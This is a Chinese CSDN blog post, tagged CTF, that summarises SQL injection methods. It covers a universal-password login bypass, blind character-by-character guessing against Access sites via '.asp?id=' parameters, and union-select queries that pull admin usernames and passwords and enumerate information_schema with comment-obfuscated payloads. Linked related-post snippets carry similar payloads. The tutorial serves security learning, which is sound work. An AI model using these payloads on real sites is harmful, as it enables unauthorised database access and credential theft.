SQL注入总结(一)

最新推荐文章于 2022-11-07 19:10:30 发布
最新推荐文章于 2022-11-07 19:10:30 发布
阅读量1.2k 收藏 7
点赞数 3
文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/arbitraty/article/details/79918783
版权

sql注入

注入的分类—仁者见仁,智者见智。

  1. 万能密码注入
    用户进行用户名和密码验证是,网站需要查询数据库。查询数据库就是执行SQL语句。
    当用户登录时,后台执行的数据库查询操作(sql语句)是【Select user_id,user_type,email Fromusers Where user_id=’ 用户名‘ And password=’ 密码’】.
    由于网站后台在进行数据库查询的时候没有对单引号进行过滤,当输入用户名为【admin】和万能密码【2‘ or 1】时,执行的sql语句为【Select user_id,user_type,email Fromusers Where user_id=’ admin’ And password=’ 2’ or‘ 1’ 】。同时,由于sql语句中逻辑运算符具有优先级,【=】优先于【and】,【and】优先于【or】,且适用传递性。因此,此sql语句在后台解析时,分成两句【Select user_id,user_type,email Fromusers Where user_id=’ admin’ And password=’ 2’】【’ 1‘ 】,两句bool值进行逻辑or运算,恒威TRUE。Sql语句的查询结果为ture,就意味着认证成功,也可以成功登录到系统中。
  2. 手工注入access库
    所谓sql注入,就是通过把sql命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的sql命令。
    首先,在以【.asp?id=32(数字任意)】结尾的链接依次添加语句【‘】【and 1=1】【and 1=2】,来判断网站是否存在注入点。
    然后,添加语句【and exists(select*from admin)】,根据页面返回结果来猜解表明。
    再次,添加语句【and exists(select admin from admin)】,来猜解admin表中的列名admin。
    最后添加语句and (select top 1 len (admin) from admin)>1,来猜解字段长度:添加【and (select top 1 asc(mid(admin,1,1)) from admin)>97】,来猜解字段中字符的ASCII码。
    通过以上四个步骤,反复猜解,即可得到数据库存储的用户名和密码
  3. 手工联合查询注入技术
    首先,在链接后面添加语句【 order by 11 (数字任意)】,根据页面返回结果,来判断站点中的字段数目。
    然后,在链接后面添加语句【 union select 1,2,3,4,5,6,7,8,9,10,11 from admin (表名)】,进行联合查询,来暴露可查询的字段编号。
    最好,根据上一步得到的字段标号,添加语句【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】,直接暴露管理员用户名和密码

1’//union//select//schema_name//from//information_schema.schemata//where/**/’1’=’1 查看数据库
1’//union//select//table_name//from//information_schema.tables//where/**/’1’=’1 插卡有哪些表
1’//union//select//column_name//from//information_schema.columns//where/**/’1’=’1 查看有那些列
union select 1,database()%23查询数据库
%23 为url编码下的# %20为空格 %00截断

Pumpkin9
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入学习心得与sqlmap使用心得
ancan8807的博客
04-07 900
做题是最好的老师 首先先来分享一下我用来练手的题目,实验吧中的简单的sql注入1,2,3 不得不说,sql注入真是一个神奇的东西,至少我以前看起来一点头绪都没有的题目能入手了 首先是简单的sql注入3(别问我为什么不是1) 打开链接之后发现 陷入沉思,这时候我决定使用sqlmap对他进行sql注入 在终端输入python2 sqlmap.py -u http://ctf5.s...
记录并总结一次简单的SQL注入实验——这个看起来有点简单!
Di_iii的博客
03-22 688
http://www.shiyanbar.com/ctf/33 id=%27 报错,是mysql id=1 and 1=1 正常,存在sql注入 id=1 order by 2 查表名 id=1%20union%20select%20null,group_concat(table_name)%20from%20information_schema.tables%20where%20table_sc...
SQL注入心得
Haowill的博客
01-09 928
一、SQL注入介绍 web应用程序没有对用户的输入没有进行严格的过滤,直接将用户参数放入数据库中进行查询,导致攻击者可以通过构造不同的SQL语句来实现对数据库的操作 漏洞利用条件 用户可以控制参数 参数带入数据库查询 二、Mysql数据库介绍 information_schema mysql 5.0以上版本,存在"information_schema"的数据库,有三个表名发错重要,SCHEMATA、TABLES和COLUMNS SCHEMATA表保存所有的数据库名(SCHEMATA_NAME)
SQL 注入(SQL Injection)学习心得
coldsummer23的博客
11-07 2923
网工小白学习安全心得,学习web渗透第一章sql注入,本文仅仅简单介绍了SQL注入的流程,SQL注入的原理,以一次完整的字符型SQL注入流程为例,其余三种都是基于这个思路,只是应对于不同的防护用不同的手段。思路重点在于明白最终想要的是数据库中的内容,怎么一步步去获得里面的数据。
SQL注入系列总结
一醉一休的博客
02-26 510
一.union注入 unionm注入:使用联合查询进行注入的前提是我们要进行的页面必须有显示位,所谓联合查询注入即是使用union合并两个或者多个select语句的机构集  1.先判断是否注入  2.再判断注入类型:字符型 / 数字型 / 搜索型  3.通过order by 进一步判断字段数(列数)  4.通过order by 判断出列数过后,再进一步在显示位替换成一些mysql的函数  5.接下来即使取当前库中的表 union select 1,group_concat('</br>',t
sql注入绕过方法总结
最新发布
12-19
sql注入绕过方法总结,绕过waf,D盾
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
sql注入攻击常用语句总结
03-29
sql注入总结 语句精简 类型丰富 种类齐全 值得学习 欢迎借鉴
SQL注入漏洞全接触.ppt
11-15
"SQL注入漏洞全接触"知识点总结 一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及...
防御SQL注入的方法总结
09-10
SQL注入是一种常见的网络安全威胁,它允许攻击者通过输入恶意的SQL代码来操纵数据库,获取、修改、删除敏感信息,甚至完全控制数据库系统。防御SQL注入是保护网站和应用程序免受此类攻击的关键步骤。 1. SQL注入的...
SQL注入攻击实验报告
05-07
SQL注入攻击实验报告,自己写了试验的网站,举了一些基本的攻击和防御方法,有xp_cmdshell的执行,用的是sqlserver 2005
SQL手工注入实例
01-04
这是一个简单的小实例,供大家学习交流使用,通过简单的模仿使大家对注入技术有所了解,通过一次成功的注入,增加学习的兴趣
SQL手工注入教程最新版
09-18
sql注入教程,经典哦!想学注入的要看,想学防注入的更要看
手工注入教程手工SQL注入教程
04-03
手工注入教程手工SQL注入教程,网上下载的,和大家分享一下,很简单的一个内容,算作很入门级的
手工注入教程 sql数据库注入
10-31
注入 教程 手动 手工 手工注入教程 sql数据库注入
sql注入总结
weixin_51692662的博客
08-16 819
sql注入,web安全,数据库
sql注入学习总结
cy的博客
10-12 355
一.什么是sql注入sql注入是一种将sql代码添加到输入参数中,传递到sql服务器解析并执行的一种攻击手法。   二.如何预防sql注入? 产生:1.web开发人员无法保证所有的输入都已经过滤              2.攻击者利用发送给sql服务器的输入数据构造可执行的sql代码              3.数据库未做相应的安全配置 预防:1.严格检查输入变量的类型和格式...
sql注入学习小结
心怀梦想,脚踏实地
03-27 558
sql小结 注入点类型判断: 1、字符型,数字型,其他奇奇怪怪的情况。 2、and 1=1,and 1=2 tips:有些情况下都会返回页面,无法根据页面来判断时,就需要基于时间的盲注了。忘了例子在哪了。 有回显注入步骤: 1、union select 1,2,3··· %23 确定column数量,注意最好不要使用order by,order by可能内外部数据不统一产生
SQL注入学习总结【自用】
Luminous_song的博客
09-17 918
SQL注入 自己在学习过程中的一点总结 0x01 SQL注入原理 在一些Web网页中,会允许用户传入参数,并将这些参数带入数据库中进行查询,这就产生了一些注入漏洞 SQL注入漏洞需要满足以下两个条件: 参数用户可控:前端传给后端的参数内容是用户可以控制的 参数代入数据库查询:传入的参数拼接到SQL语句,且带入数据库查询 0x02 MySQL注入相关知识点 ...
信息安全技术之SQL注入攻击
12-17
信息安全技术

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值